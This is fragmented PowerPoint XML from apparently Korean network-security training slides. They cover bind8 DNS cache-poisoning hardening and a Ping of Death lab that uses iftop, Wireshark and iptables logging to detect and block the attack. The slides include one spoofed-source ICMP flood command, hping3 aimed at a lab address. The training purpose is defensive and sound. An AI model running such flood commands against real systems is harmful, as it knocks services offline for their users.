          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581296" y="1743125"/>
            <a:ext cx="5340812" cy="4408583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D994BA32-A039-4139-A7DE-C27D679DD75B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1500058472"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317760" y="985035"/>
          <a:ext cx="5327904" cy="738759"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3303148218"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3403098023"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3514532794"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234696">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변경 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변경 후</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비고</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118397"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="234696">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query-source port 33333;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라인 삭제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1054174"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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use-id-pool false;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use-id-pool true;</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false → true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8078306"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C5D17E-4C78-4D00-B07E-529D5D47B33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375608" y="3862916"/>
            <a:ext cx="1782826" cy="284226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9A3D7B-A7D5-484E-8CA8-FD5787240D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6440922" y="4741753"/>
            <a:ext cx="1516507" cy="305689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4A0B6A-B8C6-4BA4-AA37-F16B407F0089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2365999737"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6210742" y="5127703"/>
          <a:ext cx="5328158" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3378860283"/>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9152761"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="172720" marR="0" indent="-17272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질의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랜덤 값이 사용되더라도 공격을 반복적으로 수행함으로써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 오염을 성공시킬 수도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100375"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D5CEE9-902B-4C5B-83D1-A4BA74074FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="6028002"/>
            <a:ext cx="5616792" cy="460175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325303933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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</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killall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</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4) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named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33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A8E4306-90D9-4823-A00F-E0C0BBF1BB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815521" y="989087"/>
            <a:ext cx="1782826" cy="28422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4045090935"/>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Request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대용량의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단위로 분할시켜 송신하고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대상이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data</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수신하고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Fragment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재조합 할 때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CPU</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과부하 현상이 나타나게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198267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25253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hping3 --icmp --rand-source 10.10.1.101 -d 65000 --flood</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2" y="1810512"/>
            <a:ext cx="5616792" cy="4675628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># acheck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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47861960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE5B1772-AE20-40D4-AB99-B8FEFF46C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7616"/>
            <a:ext cx="5400675" cy="51276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47861800">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68957771-1FAD-43FE-890B-8B609D17D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32" y="2414016"/>
            <a:ext cx="4008438"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88961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6"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69" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1841E6-EA38-474D-9DB2-C49CFA51FD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90016"/>
            <a:ext cx="5400675" cy="144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21518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/Training/Unit/Net/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Ping of Death</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Ping of Death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iftop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확인 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차단하고 로그 기록을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남기시오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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>PoD</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1468F5E4-2EBF-4951-ADA0-008B174065B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46355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[setup]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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>탐지 항목</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격서버에서 희생자서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ping of Death </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 트래픽 양 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>희생자서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 분석해보면 패킷이 너무 커서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>여러개로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 분할된 것 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>헤더 분석 후 페이로드 크기 값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iftop</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dirty="0" err="1"/>
              <a:t>iftop</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TX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전송 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ RX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ TOTAL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전체 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cumm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 후 현재까지의 총 데이터 양 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ peak : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>피크시의 데이터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ rates : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>각각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초의 평균흐름 </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47860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40277F5-C572-4F58-BE6E-FEC242BB5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31520"/>
            <a:ext cx="5400675" cy="14446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822884C2-FCB7-47B3-9010-2F92A756233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pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="_x247862040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A32AC6-4452-49F0-9A6E-7C4AA6CC7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1036" y="896112"/>
            <a:ext cx="2003425" cy="1905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47863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14467215-CB03-4782-97E3-9A1EB557CD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1207008"/>
            <a:ext cx="5400675" cy="305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063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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ipv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷으로 쪼개져 들어오는 것을 확인 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Reassembled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>data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rsyslog</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4) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables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217" name="_x247861160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A30B93-8357-4639-9D22-964A379AD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832" y="926592"/>
            <a:ext cx="5400675" cy="3438525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9219" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAF6D21-0ED9-4F74-B7FB-B448FE8BAB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568" y="5202426"/>
            <a:ext cx="5295900" cy="449263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9221" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6642B922-BA29-46C1-B6B0-D6A5B52AA2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926592"/>
            <a:ext cx="5400675" cy="3646488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9223" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC26899-603C-4414-A161-2D1F5F8255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7674" y="5180201"/>
            <a:ext cx="5326063" cy="35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405531"/>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3690938"/>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6) tail -f /var/log/message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>되는 로그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392121" y="4248284"/>
